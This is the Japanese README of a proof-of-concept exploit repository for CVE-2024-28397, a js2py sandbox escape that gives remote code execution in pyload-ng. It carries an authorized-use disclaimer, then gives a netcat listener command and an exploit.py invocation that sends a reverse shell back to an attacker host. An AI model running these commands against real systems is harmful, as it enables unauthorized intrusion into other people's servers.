
CVE-2024-28397 の PoC エクスプロイト – js2py サンドボックスエスケープによる pyload-ng のリモートコード実行
このリポジトリには、js2py の安全でない使用に起因し pyload-ng に影響を与えるリモートコード実行脆弱性 CVE-2024-28397 の Proof-of-Concept (PoC) エクスプロイトが含まれています。
免責事項:
この PoC は教育および研究目的のみで使用してください。
所有していないシステム、またはテストする明示的な許可を得ていないシステムでは使用しないでください。
作者は、このコードの誤用について一切責任を負いません。
pyload-ng の js2pyリバースシェルを受け取るには、Python 3.x、requests ライブラリ、および netcat が必要です。
nc -lvnp 4444
python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123